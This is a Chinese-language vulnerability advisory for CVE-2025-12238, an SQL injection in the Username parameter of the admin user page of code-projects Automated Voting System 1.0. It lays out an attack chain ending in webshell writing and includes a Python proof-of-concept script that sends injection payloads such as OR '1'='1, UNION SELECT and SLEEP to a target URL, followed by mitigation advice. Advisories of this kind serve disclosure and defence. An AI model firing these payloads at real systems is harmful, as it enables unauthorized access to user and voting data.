CVE-2025-12238 | code-projects Automated Voting System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12238

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Automated Voting System 1.0

漏洞概述

CVE-2025-12238是code-projects开源项目Automated Voting System 1.0中的一个高危SQL注入漏洞。该漏洞存在于管理后台的/admin/user.php文件中的用户管理功能，攻击者可以通过Username参数注入恶意SQL语句。Automated Voting System是一个用于在线投票管理的Web应用程序，广泛应用于学校、组织和社区的投票活动。由于该系统通常处理敏感的用户信息和投票数据，此SQL注入漏洞可能导致严重的未授权数据访问、数据篡改和系统完全沦陷。攻击者利用低权限账号即可远程利用此漏洞，无需任何用户交互即可完成攻击。漏洞已被公开利用，可能对全球使用该系统的组织造成严重安全威胁。

技术细节

该SQL注入漏洞位于Automated Voting System 1.0的/admin/user.php文件中，具体涉及用户管理功能中的Username参数。漏洞根源在于应用程序未对用户输入进行充分的输入验证和SQL语句参数化处理。攻击者可以通过构造特殊的SQL payloads，如使用单引号、UNION SELECT、布尔盲注或时间盲注等技术，绕过前端过滤并执行任意SQL命令。典型的攻击向量包括：1）使用OR 1=1绕过认证；2）使用UNION SELECT提取数据库中的敏感信息，包括管理员凭据、用户数据和系统配置；3）利用SQL注入写入恶意文件或执行系统命令。攻击者首先需要获得低权限用户账号或利用系统的其他弱点获取访问权限，然后通过HTTP请求向/admin/user.php发送恶意构造的Username参数。由于该系统使用PHP和MySQL，成功的SQL注入可能导致数据库凭据泄露、敏感数据外泄，甚至通过INTO OUTFILE语句写入Webshell实现远程代码执行。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用code-projects Automated Voting System 1.0，访问/admin/user.php页面获取用户管理功能入口

STEP 2

步骤2: 认证获取

攻击者通过默认凭据、暴力破解或其他方式获取系统低权限用户账号

STEP 3

步骤3: SQL注入探测

使用SQL注入测试payload（如单引号、UNION SELECT）探测/admin/user.php的Username参数是否存在注入点

STEP 4

步骤4: 数据库枚举

通过UNION-based或Boolean-based盲注技术枚举数据库结构，提取数据库名、表名、字段名等元数据

STEP 5

步骤5: 敏感数据提取

利用SQL注入漏洞提取管理员账号、密码哈希、用户个人信息、投票数据等敏感数据

STEP 6

步骤6: 权限提升或持久化

通过SQL注入写入Webshell或修改数据库数据实现持久化控制，严重情况下可导致服务器完全沦陷

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12238 SQL Injection PoC
# Target: code-projects Automated Voting System 1.0
# Endpoint: /admin/user.php
# Parameter: Username

import requests
import sys

target_url = "http://target.com/admin/user.php"

# Basic SQL Injection test payloads
payloads = [
    "admin' OR '1'='1",
    "admin' UNION SELECT 1,2,3,4,5-- -",
    "admin' AND SLEEP(5)-- -",
    "admin' AND 1=1-- -",
    "admin' OR 1=1 LIMIT 1-- -"
]

def test_sqli():
    print(f"[*] Testing CVE-2025-12238 SQL Injection")
    print(f"[*] Target: {target_url}")
    
    for payload in payloads:
        params = {
            "Username": payload,
            # Add other required parameters if known
        }
        
        try:
            print(f"\n[*] Testing payload: {payload}")
            response = requests.get(target_url, params=params, timeout=10)
            
            # Check for SQL error indicators
            if any(indicator in response.text.lower() for indicator in 
                   ['sql syntax', 'mysql', 'warning', 'error', 'sqlite']):
                print(f"[!] Potential SQL injection detected with payload: {payload}")
                print(f"[!] Response length: {len(response.text)}")
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_sqli()

影响范围

code-projects Automated Voting System 1.0

防御指南

临时缓解措施

立即限制/admin/user.php的访问权限，仅允许受信任的管理员IP访问。对所有用户输入实施严格的输入验证，使用正则表达式限制Username参数仅接受字母数字字符。临时部署ModSecurity等WAF规则阻止SQL注入特征Payload。同时建议使用静态代码分析工具检查整个应用程序的SQL注入风险点，并考虑是否需要迁移到更安全的投票系统解决方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12238
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12238
3 Details https://www.cvedetails.com/cve/CVE-2025-12238/
4 VulDB https://vuldb.com/cve/CVE-2025-12238
5 Link https://code-projects.org/
6 Link https://github.com/xmqaq/cve/issues/8
7 Link https://vuldb.com/?ctiid.329908
8 Link https://vuldb.com/?id.329908
9 Link https://vuldb.com/?submit.673719
10 Link https://github.com/xmqaq/cve/issues/8